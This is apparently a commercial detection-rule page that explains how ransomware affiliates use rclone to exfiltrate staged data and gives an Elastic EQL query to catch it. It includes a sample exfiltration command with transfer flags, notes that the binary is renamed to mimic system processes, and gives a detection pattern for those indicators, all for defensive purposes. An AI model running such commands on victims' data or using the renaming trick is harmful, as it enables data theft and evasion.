Response playbooks, investigation guides, and Atomic Red Team tests are Pro-only. Upgrade to unlock the full detection package for THREAT-Rclone-AutomatedCloudSync.

Upgrade to Pro
THREAT-Rclone-AutomatedCloudSync Elastic Security · Elastic

Detect Automated Bulk Data Exfiltration via rclone Cloud-Sync Tooling in Elastic Security

rclone is a legitimate, widely-used open-source command-line tool for syncing files to more than 40 cloud storage backends (Mega, pCloud, Backblaze B2, Dropbox, S3-compatible endpoints, WebDAV, SFTP). Its portability, single-binary distribution, and broad backend support have made it the exfiltration tool of choice for ransomware affiliates during the double-extortion phase of an intrusion: rather than manually uploading files one at a time, the operator drops rclone (often renamed to blend in — svchost.exe, winupdate.exe, or similar), stages an attacker-authored rclone.conf pointing at a throwaway cloud account, and issues a single scripted command such as `rclone copy C:\staged\ remote:bucket --transfers=32 --multi-thread-streams=4` against previously staged data. From that point the entire transfer proceeds automatically with no further operator interaction — the defining trait of MITRE ATT&CK T1020 (Automated Exfiltration), which describes exfiltration performed automatically after data has been collected/staged, as distinct from T1029 (Scheduled Transfer, a recurring cron/task-scheduler-driven pattern already covered elsewhere in this corpus) and distinct from cloud control-plane grant abuse (T1537, where data is transferred by re-permissioning a victim-owned cloud resource rather than pushing bytes through a client tool). Conti, LockBit affiliates, BlackCat/ALPHV affiliates, and Cl0p have all been widely documented using rclone in this exact pattern immediately prior to ransomware deployment, making its appearance on an endpoint — especially a server or file share host with no legitimate business reason to run cloud-sync software — a high-confidence precursor to both data leak and imminent encryption.

MITRE ATT&CK

Tactic
Exfiltration

Elastic Detection Query

Elastic Security (Elastic)
eql
process where event.type == "start" and (process.pe.original_file_name : "rclone.exe" or process.command_line : ("*rclone.conf*", "*--multi-thread-streams*", "*--transfers*", "*copy remote:*", "*sync remote:*"))
high severity medium confidence

Elastic EQL rule over ECS process events (Elastic Defend) matching on process.pe.original_file_name — populated from PE metadata regardless of the on-disk executable name — to catch a renamed rclone binary, combined with command-line indicators for rclone's configuration and transfer flags.

Data Sources

Elastic Defend process events

Required Tables

logs-endpoint.events.process-*

False Positives & Tuning

  • IT/backup teams intentionally using rclone for legitimate cloud-storage synchronization or migration
  • DevOps automation publishing build artifacts to an approved cloud storage bucket
  • Power users syncing personal cloud storage on a workstation where local software policy permits it

Other platforms for THREAT-Rclone-AutomatedCloudSync


Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Simulated Renamed rclone Binary Execution with Transfer Flags

    Expected signal: Sysmon Event ID 1 / DeviceProcessEvents: winupdate.exe executing with ProcessVersionInfoOriginalFileName='rclone.exe' and a command line containing 'copy', 'remote:', '--multi-thread-streams', and '--transfers'.

  2. Test 2Simulated rclone.conf Creation

    Expected signal: Sysmon Event ID 11 (FileCreate) / DeviceFileEvents: rclone.conf created under %APPDATA%\rclone\ by powershell.exe.

  3. Test 3Bulk File Staging Followed by Sustained Cloud-Provider Connection

    Expected signal: File creation events for the staged archive under /tmp, followed within seconds by five outbound network connection events (Sysmon-for-Linux Event ID 3 / auditd) from curl to the test endpoint.

Unlock playbooks & atomic tests with Pro

Get the full detection package for THREAT-Rclone-AutomatedCloudSync — response playbook and atomic red team tests, plus investigation guidance and hunting queries.

df00tech Pro — £29/user/month

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance

Related Detections